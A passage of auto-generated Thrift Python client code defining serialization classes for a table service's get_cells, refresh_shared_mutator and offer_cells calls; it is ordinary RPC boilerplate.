Attributes:
- ns
- table_name
- scan_spec
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ), # 3
)
def __init__(self, ns=None, table_name=None, scan_spec=None,):
self.ns = ns
self.table_name = table_name
self.scan_spec = scan_spec
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.scan_spec = ScanSpec()
self.scan_spec.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cells_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.scan_spec != None:
oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
self.scan_spec.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cells_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype112, _size109) = iprot.readListBegin()
for _i113 in xrange(_size109):
_elem114 = Cell()
_elem114.read(iprot)
self.success.append(_elem114)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cells_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter115 in self.success:
iter115.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cells_as_arrays_args:
"""
Attributes:
- ns
- name
- scan_spec
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ), # 3
)
def __init__(self, ns=None, name=None, scan_spec=None,):
self.ns = ns
self.name = name
self.scan_spec = scan_spec
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.scan_spec = ScanSpec()
self.scan_spec.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cells_as_arrays_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.name != None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.scan_spec != None:
oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
self.scan_spec.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cells_as_arrays_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype119, _size116) = iprot.readListBegin()
for _i120 in xrange(_size116):
_elem121 = []
(_etype125, _size122) = iprot.readListBegin()
for _i126 in xrange(_size122):
_elem127 = iprot.readString();
_elem121.append(_elem127)
iprot.readListEnd()
self.success.append(_elem121)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cells_as_arrays_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.LIST, len(self.success))
for iter128 in self.success:
oprot.writeListBegin(TType.STRING, len(iter128))
for iter129 in iter128:
oprot.writeString(iter129)
oprot.writeListEnd()
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cells_serialized_args:
"""
Attributes:
- ns
- name
- scan_spec
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ), # 3
)
def __init__(self, ns=None, name=None, scan_spec=None,):
self.ns = ns
self.name = name
self.scan_spec = scan_spec
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.scan_spec = ScanSpec()
self.scan_spec.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cells_serialized_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.name != None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.scan_spec != None:
oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
self.scan_spec.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_cells_serialized_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_cells_serialized_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class refresh_shared_mutator_args:
"""
Attributes:
- ns
- table_name
- mutate_spec
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
)
def __init__(self, ns=None, table_name=None, mutate_spec=None,):
self.ns = ns
self.table_name = table_name
self.mutate_spec = mutate_spec
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.mutate_spec = MutateSpec()
self.mutate_spec.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('refresh_shared_mutator_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.mutate_spec != None:
oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
self.mutate_spec.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class refresh_shared_mutator_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('refresh_shared_mutator_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cells_args:
"""
Attributes:
- ns
- table_name
- mutate_spec
- cells
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
(4, TType.LIST, 'cells', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 4
)
def __init__(self, ns=None, table_name=None, mutate_spec=None, cells=None,):
self.ns = ns
self.table_name = table_name
self.mutate_spec = mutate_spec
self.cells = cells
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.mutate_spec = MutateSpec()
self.mutate_spec.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.LIST:
self.cells = []
(_etype133, _size130) = iprot.readListBegin()
for _i134 in xrange(_size130):
_elem135 = Cell()
_elem135.read(iprot)
self.cells.append(_elem135)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cells_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.mutate_spec != None:
oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
self.mutate_spec.write(oprot)
oprot.writeFieldEnd()
if self.cells != None:
oprot.writeFieldBegin('cells', TType.LIST, 4)
oprot.writeListBegin(TType.STRUCT, len(self.cells))
for iter136 in self.cells:
iter136.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cells_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cells_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cells_as_arrays_args:
"""
Attributes:
- ns
- table_name
- mutate_spec
- cells
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
(4, TType.LIST, 'cells', (TType.LIST,(TType.STRING,None)), None, ), # 4
)
def __init__(self, ns=None, table_name=None, mutate_spec=None, cells=None,):
self.ns = ns
self.table_name = table_name
self.mutate_spec = mutate_spec
self.cells = cells
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.mutate_spec = MutateSpec()
self.mutate_spec.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.LIST:
self.cells = []
(_etype140, _size137) = iprot.readListBegin()
for _i141 in xrange(_size137):
_elem142 = []
(_etype146, _size143) = iprot.readListBegin()
for _i147 in xrange(_size143):
_elem148 = iprot.readString();
_elem142.append(_elem148)
iprot.readListEnd()
self.cells.append(_elem142)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cells_as_arrays_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.mutate_spec != None:
oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
self.mutate_spec.write(oprot)
oprot.writeFieldEnd()
if self.cells != None:
oprot.writeFieldBegin('cells', TType.LIST, 4)
oprot.writeListBegin(TType.LIST, len(self.cells))
for iter149 in self.cells:
oprot.writeListBegin(TType.STRING, len(iter149))
for iter150 in iter149:
oprot.writeString(iter150)
oprot.writeListEnd()
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cells_as_arrays_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cells_as_arrays_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cell_args:
"""
Attributes:
- ns
- table_name
- mutate_spec
- cell
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRUCT, 'mutate_spec', (MutateSpec, MutateSpec.thrift_spec), None, ), # 3
(4, TType.STRUCT, 'cell', (Cell, Cell.thrift_spec), None, ), # 4
)
def __init__(self, ns=None, table_name=None, mutate_spec=None, cell=None,):
self.ns = ns
self.table_name = table_name
self.mutate_spec = mutate_spec
self.cell = cell
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.mutate_spec = MutateSpec()
self.mutate_spec.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.cell = Cell()
self.cell.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cell_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.mutate_spec != None:
oprot.writeFieldBegin('mutate_spec', TType.STRUCT, 3)
self.mutate_spec.write(oprot)
oprot.writeFieldEnd()
if self.cell != None:
oprot.writeFieldBegin('cell', TType.STRUCT, 4)
self.cell.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cell_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('offer_cell_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class offer_cell_as_array_args:
"""
Attributes:
- ns
- table_name
- mutate_spec
- cell
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
